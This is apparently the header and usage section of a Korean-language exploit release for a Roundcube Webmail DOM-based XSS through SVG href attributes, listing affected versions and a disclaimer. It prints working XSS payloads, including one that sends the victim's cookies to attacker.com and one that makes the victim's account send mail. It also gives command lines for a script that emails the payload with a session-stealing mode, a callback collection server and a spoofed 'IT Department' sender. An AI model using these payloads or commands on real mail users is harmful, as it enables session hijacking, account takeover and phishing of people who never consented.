
Python Roundcube Webmail DOM 기반 XSS(CVE-2026-25916) 익스플로잇으로, SVG href 속성을 통해 제작된 이메일로 세션 하이재킹 및 데이터 유출을 가능하게 합니다.
익스플로잇 제목: Roundcube Webmail DOM XSS via SVG href (CVE-2026-25916)
작성자: Mohammed Idrees Banyamer
연락처: GitHub @mbanyamer | Instagram @banyamer_security
국가: 요르단
날짜: 2026년 2월 9일
CVE: CVE-2026-25916
유형: DOM 기반 크로스 사이트 스크립팅(XSS)
플랫폼: 웹 애플리케이션
테스트 환경: Roundcube 1.6.8, Ubuntu 22.04
CVSS 점수: 6.1 (중간)
⚠️ 경고: 이 익스플로잇은 교육 및 승인된 테스트 목적으로만 사용하십시오.
소유한 시스템 또는 명시적인 서면 허가를 받은 시스템에서만 사용하십시오.
작성자는 오용 또는 불법 활동에 대해 책임을 지지 않습니다.
Roundcube Webmail 1.6.9 이전 버전에는 SVG 처리 과정에서 DOM 기반 XSS 취약점이 존재합니다. 애플리케이션이 SVG 요소의 href 및 xlink:href 속성을 제대로 검증하지 못하여, 특수하게 제작된 이메일을 통해 JavaScript 실행이 가능합니다.
영향을 받는 버전: Roundcube Webmail < 1.6.9
수정된 버전: 1.6.9 (커밋 26d7677)
CWE: CWE-79 - 웹 페이지 생성 중 입력의 부적절한 중화
공격 경로: 이메일을 통한 원격 공격
영향: 세션 하이재킹, 계정 탈취, 데이터 유출
이 취약점은 rcube_washtml.php에 존재하며, SVG 요소의 href 속성이 제대로 검증되지 않았습니다:
<!-- 취약한 SVG 요소 -->
<use href="javascript:alert(document.cookie)">
<image xlink:href="javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)">
<a xlink:href="javascript:fetch('/?_task=mail&_action=send',{method:'POST',body:'[email protected]'})">
```bash
python3 cve-2026-25916.py -s smtp.gmail.com -p 587 -u [email protected] -w your_password -r [email protected]
python3 cve-2026-25916.py \
-s smtp.gmail.com \
-p 587 \
-u [email protected] \
-w app_password \
-r [email protected] \
-t session_steal \
--callback https://yourserver.com/collect \
--subject "Security Alert" \
--from-name "IT Department"